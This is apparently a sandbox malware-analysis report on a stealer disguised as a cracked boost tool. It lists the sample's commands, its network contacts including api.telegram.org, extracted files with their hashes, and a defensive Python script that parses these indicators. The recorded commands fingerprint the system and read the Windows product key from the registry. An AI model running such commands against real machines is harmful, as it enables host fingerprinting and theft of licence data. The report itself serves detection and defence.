C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 13.107.42.16:443 N/A tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 76.234.34.23.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 blank-bno4d.in udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 199.232.210.172:80 N/A tcp
US 8.8.8.8:53 88.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI18562\python311.dll

C:\Users\Admin\AppData\Local\Temp\_MEI18562\VCRUNTIME140.dll

memory/2064-26-0x00007FFD40870000-0x00007FFD40E59000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI18562\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI18562\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI18562\blank.aes

MD5 7a959f835f18413a62817c2a945276ce
SHA1 3d77b773782ee5305486efed0286efe23f812443
SHA256 ac865b84b1fe0b4e117d77122501caa540b65ae6b3d7f1eed6fc3424cdf8709c
SHA512 4cb20a09c5f4dfb793e3dd30567d193b1744c74d3a93f54fddb2dab780ce4c466b140fa1234c738fddb7252603e60db3047424a1aab516f341057eebb8c799eb

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

memory/2064-50-0x00007FFD54610000-0x00007FFD5461F000-memory.dmp

memory/2064-49-0x00007FFD50760000-0x00007FFD50783000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_decimal.pyd

MD5 e3fb8bf23d857b1eb860923ccc47baa5
SHA1 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0
SHA256 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3
SHA512 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

C:\Users\Admin\AppData\Local\Temp\_MEI18562\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

C:\Users\Admin\AppData\Local\Temp\_MEI18562\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

C:\Users\Admin\AppData\Local\Temp\_MEI18562\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

C:\Users\Admin\AppData\Local\Temp\_MEI18562\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

C:\Users\Admin\AppData\Local\Temp\_MEI18562\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI18562\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

C:\Users\Admin\AppData\Local\Temp\_MEI18562\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512 b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

C:\Users\Admin\AppData\Local\Temp\_MEI18562\bound.blank

MD5 7705111a97e722d4bb4a0b91d8a6b55f
SHA1 474b52afdd55503fb2f3c2ca7c53824e8785ede8
SHA256 6c2330df293aaff501678a9783b4b8886368cb6011465b4256bfbed4c82ea224
SHA512 c096914345acc01859d0fb03d9c2f2f215d189ec6854987e349d434f80eeccfbd71fddaeef093deda560b48c1b0fedabdd560e1e1c80c4761a9557dddba343a4

memory/2064-56-0x00007FFD4FE10000-0x00007FFD4FE3D000-memory.dmp

memory/2064-58-0x00007FFD504B0000-0x00007FFD504C9000-memory.dmp

memory/2064-60-0x00007FFD4FDE0000-0x00007FFD4FE03000-memory.dmp

memory/2064-62-0x00007FFD40500000-0x00007FFD40677000-memory.dmp

memory/2064-66-0x00007FFD50BD0000-0x00007FFD50BDD000-memory.dmp

memory/2064-65-0x00007FFD4FDC0000-0x00007FFD4FDD9000-memory.dmp

memory/2064-71-0x00007FFD3FE20000-0x00007FFD40340000-memory.dmp

memory/2064-72-0x00007FFD3FD50000-0x00007FFD3FE1D000-memory.dmp

memory/2064-69-0x00007FFD4DFB0000-0x00007FFD4DFE3000-memory.dmp

memory/2064-77-0x00007FFD50160000-0x00007FFD5016D000-memory.dmp

memory/2064-76-0x00007FFD40870000-0x00007FFD40E59000-memory.dmp

memory/2064-75-0x00007FFD50940000-0x00007FFD50954000-memory.dmp

memory/2064-81-0x00007FFD40750000-0x00007FFD4086C000-memory.dmp

memory/2064-80-0x00007FFD50760000-0x00007FFD50783000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bound.exe

MD5 84aede3aa04bb514b90dcb124d948e1f
SHA1 8a0c6a152050a2f6cc0601b2a5c59f5f6c908c17
SHA256 3aeebdc59e7210fd533b8b3dfc8a8c45ca7c9c0f9507aa15924b025f2c3ef1da
SHA512 38c88dbbad0abb249d5ee362a2393bdc63f78a09497e2a012f473ceef59b45de00dddac74dc001cc04a03352baec13aeaffbc587e96bc05de24fa7647e84088a

memory/116-84-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/2872-90-0x000002B50FD00000-0x000002B50FD22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ehyre2gq.5oh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/116-116-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/116-115-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/116-117-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/116-119-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/116-118-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/116-120-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe

MD5 5a796657b6f3717a1d30cd47d29f776a
SHA1 2d87d2b839845709d122d9464b77bb5c25d410f9
SHA256 c5236198f5fc86b31951528ee1f3f881746f8a03afe9c00628b27707871d9159
SHA512 29efda3f2c7e8e0aa406959e9b71b826c51e0dca66282320109cadb87f04ec2744a6e08cec8f87c2f2a5ea334c3a59d7eb697edd667ff0f49974f29a74fc908d

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\vcruntime140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

MD5 8140bdc5803a4893509f0e39b67158ce
SHA1 653cc1c82ba6240b0186623724aec3287e9bc232
SHA256 39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769
SHA512 d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\python3.dll

MD5 34e49bb1dfddf6037f0001d9aefe7d61
SHA1 a25a39dca11cdc195c9ecd49e95657a3e4fe3215
SHA256 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281
SHA512 edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

MD5 6a9ca97c039d9bbb7abf40b53c851198
SHA1 01bcbd134a76ccd4f3badb5f4056abedcff60734
SHA256 e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535
SHA512 dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\libffi-8.dll

MD5 32d36d2b0719db2b739af803c5e1c2f5
SHA1 023c4f1159a2a05420f68daf939b9ac2b04ab082
SHA256 128a583e821e52b595eb4b3dda17697d3ca456ee72945f7ecce48ededad0e93c
SHA512 a0a68cfc2f96cb1afd29db185c940e9838b6d097d2591b0a2e66830dd500e8b9538d170125a00ee8c22b8251181b73518b73de94beeedd421d3e888564a111c1

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\psutil\_psutil_windows.pyd

MD5 ebefbc98d468560b222f2d2d30ebb95c
SHA1 ee267e3a6e5bed1a15055451efcccac327d2bc43
SHA256 67c17558b635d6027ddbb781ea4e79fc0618bbec7485bd6d84b0ebcd9ef6a478
SHA512 ab9f949adfe9475b0ba8c37fa14b0705923f79c8a10b81446abc448ad38d5d55516f729b570d641926610c99df834223567c1efde166e6a0f805c9e2a35556e3

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\select.pyd

MD5 97ee623f1217a7b4b7de5769b7b665d6
SHA1 95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0
SHA256 0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790
SHA512 20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

\??\c:\Users\Admin\AppData\Local\Temp\xgkvbgin\xgkvbgin.cmdline

MD5 6aeafdc059496d06e6faac6b12138bca
SHA1 b4d9560e7c2f7139a3e439ee7304f1b7e81ca778
SHA256 03d6e22c8a5e11b743ffc41a5b4c22adf20ca93cf4070a627576064691a06973
SHA512 4716afcfaedb49b0f6b82dde74418e72f05b7f8ca01bfaa86c607fa4c82a2368f5cef9852f7b393c4486a5aa9c12b1a7f02fded474f4c74403f38d8734b4d50c

\??\c:\Users\Admin\AppData\Local\Temp\xgkvbgin\xgkvbgin.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

memory/1768-278-0x000001DE24A60000-0x000001DE24A68000-memory.dmp

memory/2064-329-0x00007FFD50760000-0x00007FFD50783000-memory.dmp

memory/2064-343-0x00007FFD4FDE0000-0x00007FFD4FE03000-memory.dmp

memory/2064-339-0x00007FFD3FD50000-0x00007FFD3FE1D000-memory.dmp

memory/2064-338-0x00007FFD3FE20000-0x00007FFD40340000-memory.dmp

memory/2064-337-0x00007FFD4DFB0000-0x00007FFD4DFE3000-memory.dmp

memory/2064-335-0x00007FFD4FDC0000-0x00007FFD4FDD9000-memory.dmp

memory/2064-334-0x00007FFD40500000-0x00007FFD40677000-memory.dmp

memory/2064-328-0x00007FFD40870000-0x00007FFD40E59000-memory.dmp

memory/116-364-0x00007FF761F00000-0x00007FF762D09000-memory.dmp

memory/2064-365-0x00007FFD40870000-0x00007FFD40E59000-memory.dmp

memory/2064-379-0x00007FFD40750000-0x00007FFD4086C000-memory.dmp

memory/2064-384-0x00007FFD4FDE0000-0x00007FFD4FE03000-memory.dmp

memory/2064-383-0x00007FFD504B0000-0x00007FFD504C9000-memory.dmp

memory/2064-382-0x00007FFD4FE10000-0x00007FFD4FE3D000-memory.dmp

memory/2064-381-0x00007FFD54610000-0x00007FFD5461F000-memory.dmp

memory/2064-380-0x00007FFD50760000-0x00007FFD50783000-memory.dmp

memory/2064-378-0x00007FFD50160000-0x00007FFD5016D000-memory.dmp

memory/2064-377-0x00007FFD50940000-0x00007FFD50954000-memory.dmp

memory/2064-376-0x00007FFD3FD50000-0x00007FFD3FE1D000-memory.dmp

memory/2064-375-0x00007FFD3FE20000-0x00007FFD40340000-memory.dmp

memory/2064-374-0x00007FFD4DFB0000-0x00007FFD4DFE3000-memory.dmp

memory/2064-373-0x00007FFD50BD0000-0x00007FFD50BDD000-memory.dmp

memory/2064-372-0x00007FFD4FDC0000-0x00007FFD4FDD9000-memory.dmp

memory/2064-371-0x00007FFD40500000-0x00007FFD40677000-memory.dmp
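The Files listing above is the IOC table for this run: one path per entry followed by its MD5/SHA1/SHA256/SHA512 lines, with memory-dump entries interleaved. As an added example (not the sandbox's or the report's own code), the Python below parses that block format, groups entries by their PyInstaller `_MEI<digits>` extraction directory, and flags a directory when it carries the BlankGrabber marker files listed above (blank.aes, bound.blank, rar.exe, rarreg.key); treating blank.aes plus bound.blank as the required pair is my assumption, not something the report states. The embedded sample is an abridged excerpt of the listing above with most hash lines dropped; hash lines of the wrong length, or a hash line with no preceding path, are rejected instead of being stored as IOCs.

```python
"""Added example: parse this report's Files section and flag the PyInstaller
extraction directory that carries BlankGrabber's marker files.
Not part of the original report or of the sandbox's own code."""
import re
from dataclasses import dataclass, field

# Hash lines in the report look like "<ALGO> <hex>"; expected hex length per algorithm.
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# PyInstaller onefile extraction directory: ...\_MEI<digits>\<file>
MEI_DIR = re.compile(r"^(.*\\_MEI\d+)\\", re.IGNORECASE)

# Names the report lists inside _MEI18562 that characterise a BlankGrabber bundle:
# the AES-encrypted stub, the bound payload and the bundled WinRAR.
BLANKGRABBER_MARKERS = {"blank.aes", "bound.blank", "rar.exe", "rarreg.key"}
REQUIRED_MARKERS = {"blank.aes", "bound.blank"}  # assumption: this pair is decisive


@dataclass
class FileRecord:
    path: str
    hashes: dict = field(default_factory=dict)

    @property
    def name(self) -> str:
        return self.path.rsplit("\\", 1)[-1].lower()


def parse_files_section(text: str):
    """Return (file_records, memory_dump_names) for one Files section.

    Any non-empty line that is neither a hash line nor a memory/ entry starts a
    new file entry. A hash line with no current entry, or with the wrong digest
    length for its algorithm, raises ValueError rather than polluting the IOC set.
    """
    records, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None or len(digest) != HASH_LEN[algo]:
                raise ValueError(f"malformed hash line: {line!r}")
            current.hashes[algo] = digest
        elif line.startswith("memory/"):
            dumps.append(line)   # memory dumps carry no hashes in this format
            current = None
        else:
            current = FileRecord(path=line)
            records.append(current)
    return records, dumps


def pyinstaller_bundles(records):
    """Group records by their _MEI<digits> extraction directory."""
    bundles = {}
    for rec in records:
        m = MEI_DIR.match(rec.path)
        if m:
            bundles.setdefault(m.group(1), []).append(rec)
    return bundles


def flag_blankgrabber(records):
    """Map each _MEI directory that holds both required markers to the markers seen."""
    hits = {}
    for directory, recs in pyinstaller_bundles(records).items():
        found = BLANKGRABBER_MARKERS & {r.name for r in recs}
        if REQUIRED_MARKERS <= found:
            hits[directory] = sorted(found)
    return hits


def sha256_iocs(records):
    """SHA256 -> path for every hashed file, ready for a blocklist or hunt query."""
    return {r.hashes["SHA256"]: r.path for r in records if "SHA256" in r.hashes}


# Abridged excerpt of this report's Files section (paths and digests as listed
# on the page; most hash lines omitted to keep the sample short).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\_MEI18562\blank.aes

MD5 7a959f835f18413a62817c2a945276ce
SHA1 3d77b773782ee5305486efed0286efe23f812443
SHA256 ac865b84b1fe0b4e117d77122501caa540b65ae6b3d7f1eed6fc3424cdf8709c
SHA512 4cb20a09c5f4dfb793e3dd30567d193b1744c74d3a93f54fddb2dab780ce4c466b140fa1234c738fddb7252603e60db3047424a1aab516f341057eebb8c799eb

C:\Users\Admin\AppData\Local\Temp\_MEI18562\bound.blank

SHA256 6c2330df293aaff501678a9783b4b8886368cb6011465b4256bfbed4c82ea224

C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe

SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

memory/2064-56-0x00007FFD4FE10000-0x00007FFD4FE3D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bound.exe

SHA256 3aeebdc59e7210fd533b8b3dfc8a8c45ca7c9c0f9507aa15924b025f2c3ef1da

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe

SHA256 c5236198f5fc86b31951528ee1f3f881746f8a03afe9c00628b27707871d9159
"""

if __name__ == "__main__":
    recs, dumps = parse_files_section(SAMPLE)
    print(f"{len(recs)} files, {len(dumps)} memory dumps")
    for directory, markers in flag_blankgrabber(recs).items():
        print(f"BlankGrabber bundle in {directory}: {', '.join(markers)}")
    for digest, path in sha256_iocs(recs).items():
        print(digest, path)
```

Run against the full listing above, the same functions also pick up the Nuitka `onefile_116_...` directory of bound.exe as ordinary records (no `_MEI` grouping), so the grabber bundle and the bound second-stage stay distinguishable in the output.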

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:22

Platform

win7-20240221-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win7-20240508-en

Max time kernel

120s

Max time network

121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml

Signatures

Enumerates physical storage devices

Modifies registry class

(Every key below is written by rundll32.exe running shell32.dll,OpenAs_RunDLL, the "Open With" prompt Windows raises when cmd /c is handed a .yml file with no registered handler; the resulting yml_auto_file association pointing at AcroRd32.exe is the sandbox's file-handling reaction to config.yml, not a change the sample made for persistence.)

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.yml C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.yml\ = "yml_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\yml_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml

C:\Windows\system32\rundll32.exe

